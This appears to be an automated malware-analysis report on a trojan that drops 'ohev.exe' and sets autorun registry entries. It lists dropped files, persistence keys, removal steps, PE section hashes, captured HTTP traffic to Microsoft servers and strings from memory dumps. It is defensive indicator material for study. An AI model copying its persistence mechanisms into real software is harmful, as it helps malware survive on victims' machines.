%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5302 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (137010 bytes)
%WinDir%\comsetup.log (49590 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242961 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\tmp\M7ADGJNQ\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\SIMQUY25\Microsoft.PowerShell.Security.resources.dll (9 bytes)
%WinDir%\assembly\tmp\TGKNQUX0\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\5UY26AEJ\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
%WinDir%\assembly\tmp\VJNRVZ37\Microsoft.WSMan.Runtime.dll (7 bytes)
%WinDir%\assembly\tmp\YKOSW048\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
%WinDir%\assembly\tmp\7RUY147A\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
%WinDir%\assembly\tmp\QBEILORU\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
%WinDir%\assembly\tmp\3NQUX036\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
%WinDir%\assembly\tmp\QDHLOSW0\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
%WinDir%\assembly\tmp\SCFJMPSV\Microsoft.PowerShell.Security.dll (2392 bytes)
%WinDir%\assembly\tmp\G037ADGJ\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
%WinDir%\assembly\tmp\CWZ269CF\Microsoft.PowerShell.Editor.dll (32824 bytes)
%WinDir%\assembly\tmp\3NQTW036\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
%WinDir%\assembly\tmp\WJOSX16A\Microsoft.WSMan.Management.resources.dll (13 bytes)
%WinDir%\assembly\tmp\I269CFIM\System.Management.Automation.resources.dll (9320 bytes)
%WinDir%\assembly\tmp\1LOSVY14\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
%WinDir%\assembly\tmp\WKOSW048\Microsoft.WSMan.Management.dll (9608 bytes)
%WinDir%\assembly\tmp\SEIMQUY2\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
%WinDir%\assembly\tmp\6VY26AEI\System.Management.Automation.dll (81046 bytes)
%WinDir%\assembly\tmp\PADGJNQT\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
%WinDir%\assembly\tmp\AUX047AD\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
%WinDir%\assembly\tmp\O8BEHLOR\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\UUPPHBZOfNIWNOEBZBhdR.exe (5441 bytes)
%Documents and Settings%\%current user%\Application Data\TcEMbLQgCOBP (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\WindowsXP-KB968930-x86-ENG[1].exe (2977755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe (45823 bytes)
%Documents and Settings%\%current user%\Application Data\2b086d\d4387d.48198b5 (9 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\uk-ua[1].htm (27121 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\c53169.lnk (801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\228ab4.48198b5 (49 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (776 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[2].txt (162 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\48d1ef.lnk (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\bcb529\910776.bat (94 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exec"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 26060 | 26112 | 4.42534 | ec6c00d0dbffd0aaf40d629cdc5fbbf7 |
.data | 32768 | 6796 | 1024 | 2.20139 | 317f8a934ee443eee01c2a315bde9ca1 |
.idata | 40960 | 4216 | 4608 | 3.49941 | d8675ba112ef922c6057a02546757a1a |
.rsrc | 49152 | 775003 | 775168 | 5.18253 | 4d679e1aa76a7449bd880fa36dfcdce8 |
.reloc | 827392 | 5038 | 5120 | 2.58043 | 83de2f9b2c95be6fea06bced7e8a058e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 1
78beabc7c6a1bab138ba6aa59a6f66e8
Network Activity
URLs
URL | IP |
---|---|
hxxp://microsoft.com/ | |
hxxp://e2847.dspb.akamaiedge.net/ | |
hxxp://e2847.dspb.akamaiedge.net/uk-ua/ | |
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | |
hxxp://www.microsoft.com/ | 23.61.219.168 |
hxxp://www.microsoft.com/uk-ua/ | 23.61.219.168 |
hxxp://download.microsoft.com/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe | 84.53.167.128 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 302 Moved Temporarily
Server: AkamaiGHost
Content-Length: 0
Location: hXXp://VVV.microsoft.com/uk-ua/
Date: Mon, 27 Jun 2016 23:01:31 GMT
Connection: keep-alive
X-CCC: SE
X-CID: 2
....
GET /uk-ua/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Cache-Control: no-cache
Host: VVV.microsoft.com
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/8.0
CorrelationVector: ahvTkOAUdk6BlrWx.1.4
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Credentials: true
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Frame-Options: SAMEORIGIN
Content-Length: 63551
Date: Mon, 27 Jun 2016 23:01:32 GMT
Connection: keep-alive
Set-Cookie: MS-CV=ahvTkOAUdk6BlrWx.1; domain=.microsoft.com; expires=Tue, 28-Jun-2016 23:01:31 GMT; path=/
Set-Cookie: MS-CV=ahvTkOAUdk6BlrWx.2; domain=.microsoft.com; expires=Tue, 28-Jun-2016 23:01:32 GMT; path=/
X-CCC: SE
X-CID: 2
...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk-ua" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js">.. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><script type="text/javascript" src="hXXps://cdn.optimizely.com/js/6212760188.js"></script><script type="text/javascript" src="//c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=3402EA63-9A93-A79A-085A-5FDA6D3F966E"></script><title>Microsoft..... ................ ..........
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: microsoft.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: hXXp://VVV.microsoft.com/
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 27 Jun 2016 23:01:23 GMT
Content-Length: 148
<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..Date: Mon, 27 Jun 2016 23:01:23 GMT..Content-Length: 148..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..
GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: download.microsoft.com
Cache-Control: no-cache
Cookie: MS-CV=ahvTkOAUdk6BlrWx.2
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT
Accept-Ranges: bytes
ETag: "6d3979883b49ca1:0"
Server: Microsoft-IIS/8.5
Content-Disposition: attachment
Content-Length: 6156064
Date: Mon, 27 Jun 2016 23:01:37 GMT
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
regsvr32.exe_324:
.idata
.idata
.reloc
.reloc
P.rsrc
P.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
USER32.DLL
USER32.DLL
wininet.dll
wininet.dll
user32.dll
user32.dll
ntdll.dll
ntdll.dll
Kernel32.dll
Kernel32.dll
URLMON.DLL
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
PSAPI.dll
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('object'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
try {var els=document.getElementsByTagName('embed'); for(var i=0;i
